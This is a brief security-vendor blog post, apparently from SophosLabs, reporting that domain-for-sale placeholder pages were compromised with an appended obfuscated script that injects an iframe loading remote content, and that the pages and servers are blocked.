Get a domain – get infected

Image (1) dominf-1.gif for post 19678

Clearly shopping around for wedding venues is not the only activity to get you in trouble nowadays. Over the past few days SophosLabs have detected yet another slew of web pages that have been compromised to turn them into drive-by download sites. A batch of the sites affected are placeholders for several ‘attractive’ domain names that are for sale:

[Screenshot from one compromised site]

All the compromised pages have been modified to append a malicious script to the bottom of file. When the page is viewed, the script writes a iframe to the page in order to load further malicious content from a remote server. Some pages look to have been compromised multiple times, with additional iframe tags added before the script. An example compromised page is shown in the figure below – the top pane shows the decrypted script, the bottom pane the tail of the compromised page:

[SophosLabs source decryption tool]

The specific purpose of the attack is unknown at this time, the remote servers referenced are currently not responding. For now, be assured that the compromised pages were pro-actively blocked as Mal/ObfJS-H and the target servers are blocked by the WS1000.